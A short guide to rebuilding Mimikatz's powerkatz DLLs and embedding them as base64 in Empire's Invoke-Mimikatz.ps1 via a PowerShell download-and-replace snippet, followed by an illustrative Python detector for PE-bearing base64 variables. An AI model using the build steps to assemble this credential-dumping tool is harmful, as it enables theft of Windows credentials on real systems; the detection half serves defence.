Obfuscate Mimikatz


Update .ps1

Update the Invoke-Mimikatz.ps1 PowerShell script:

  1. Download the source code zip from the latest release of Mimikatz (or any release you want).

  2. Open the solution in Visual Studio.

  3. Select the Second_Release_PowerShell target option and compile for Win32.

  4. Right-click on the mimikatz solution > Properties > C/C++ > set Treat warnings as errors to No (/WX-) > OK.

  5. Compile for x64.

  6. Convert the resulting powerkatz DLLs to base64 and replace the $PEBytes32 and $PEBytes64 variables at the bottom of Invoke-Mimikatz.ps1 using the PowerShell script below.

$powerkatz32 = [System.IO.File]::ReadAllBytes("Win32\powerkatz.dll")
$powerkatz64 = [System.IO.File]::ReadAllBytes("x64\powerkatz.dll")
$encPowerkatz32 = [System.Convert]::ToBase64String($powerkatz32)
$encPowerkatz64 = [System.Convert]::ToBase64String($powerkatz64)
$invokeMimikatz = (New-Object Net.WebClient).DownloadString("https://github.com/BC-SECURITY/Empire/raw/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1") -replace '\$PEBytes32 = .*$', ('$PEBytes32 = ' + "'$encPowerkatz32'")
$invokeMimikatz -replace '\$PEBytes64 = .*$', ('$PEBytes64 = ' + "'$encPowerkatz64'") > Invoke-Mimikatz.ps1
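
Detection side of the same artifact: the resulting script carries each DLL as one quoted base64 literal ($PEBytes32, $PEBytes64), so a scanner can flag any .ps1 whose base64 variable decodes to an MZ/PE header, whatever the variable is called. This Python code is an added example, not part of the original page or of the Empire or Mimikatz projects; the function names and the sample input are constructed for illustration.

```python
import base64
import binascii
import re
import struct

# A PowerShell variable assigned a quoted base64 literal of 64+ characters.
ASSIGN_RE = re.compile(
    r"^\s*\$(?P<var>\w+)\s*=\s*(?P<q>['\"])(?P<b64>[A-Za-z0-9+/]{64,}={0,2})(?P=q)",
    re.MULTILINE,
)
MACHINES = {0x014C: "x86", 0x8664: "x64"}  # IMAGE_FILE_MACHINE_I386 / _AMD64

def pe_machine(blob: bytes):
    """Return the COFF machine name if blob begins with an MZ/PE header, else None."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)  # offset of the PE signature
    if e_lfanew + 6 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    (machine,) = struct.unpack_from("<H", blob, e_lfanew + 4)
    return MACHINES.get(machine, hex(machine))

def find_embedded_pe(script_text: str):
    """Return [(variable, machine, decoded_size)] for base64 variables holding a PE."""
    hits = []
    for m in ASSIGN_RE.finditer(script_text):
        b64 = m.group("b64")
        try:
            # Headers sit in the first bytes; a 4096-char slice stays 4-aligned.
            head = base64.b64decode(b64[:4096], validate=True)
        except binascii.Error:
            continue  # matched the character class but is not valid base64
        machine = pe_machine(head)
        if machine:
            size = len(b64) * 3 // 4 - (len(b64) - len(b64.rstrip("=")))
            hits.append((m.group("var"), machine, size))
    return hits

def _fake_pe(machine: int) -> bytes:
    """Constructed input: 70 header bytes that parse as MZ/PE, not a real DLL."""
    return (b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
            + b"PE\0\0" + struct.pack("<H", machine))

# Constructed sample script text: two PE-bearing variables and one benign blob.
SAMPLE = "\n".join([
    "    $PEBytes32 = '%s'" % base64.b64encode(_fake_pe(0x014C)).decode(),
    '    $PEBytes64 = "%s"' % base64.b64encode(_fake_pe(0x8664)).decode(),
    "    $Note = '%s'" % base64.b64encode(b"A" * 90).decode(),
])
```

Run `find_embedded_pe()` over script content captured from PowerShell script block logging or over files on disk; a hit on a renamed variable is still a hit, because the check keys on the decoded header rather than the name.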
